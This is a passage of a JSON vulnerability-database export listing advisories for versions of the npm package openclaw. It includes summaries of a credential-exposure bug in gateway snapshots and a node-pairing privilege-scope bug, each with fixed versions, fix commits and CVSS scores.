vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-pjvx-rx66-r3fg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tu4b-f885-eyds"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91368?format=json","vulnerability_id":"VCID-twsq-vfde-4fbf","summary":"OpenClaw Exposes Credentials Embedded in baseUrl Fields via config.get and channels.status\n## Summary\nRead-scoped gateway snapshots could expose credentials embedded in channel baseUrl and related endpoint fields.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `f0202264d0de7ad345382b9008c5963bcefb01b7`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/channels/account-snapshot-fields.ts now strips URL userinfo from channel status snapshot fields.\n- src/config/redact-snapshot.ts now redacts credential-bearing baseUrl and httpUrl fields while preserving safe context.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f0202264d0de7ad345382b9008c5963bcefb01b7","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/f0202264d0de7ad345382b9008c5963bcefb01b7"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-ppwq-6v66-5m6j","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-ppwq-6v66-5m6j"},{"reference_url":"https://github.com/advisories/GHSA-ppwq-6v66-5m6j","reference_id":"GHSA-ppwq-6v66-5m6j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ppwq-6v66-5m6j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["GHSA-ppwq-6v66-5m6j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-twsq-vfde-4fbf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89807?format=json","vulnerability_id":"VCID-u1ru-vdfp-x3hu","summary":"OpenClaw: node.pair.approve missing callerScopes validation allows low-privilege operator to approve malicious nodes\n## Summary\n\nThe node pairing approval path did not consistently enforce that the approving caller already held every scope requested by the node.\n\n## Impact\n\nA lower-privileged operator could approve a pending node request for broader scopes and extend privileges onto the paired node.\n\n## Affected Component\n\n`src/infra/node-pairing.ts, src/gateway/server-methods/nodes.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `4d7cc6bb4f` (`gateway: restrict node pairing approvals`).\n\nOpenClaw thanks @AntAISecurityLab for 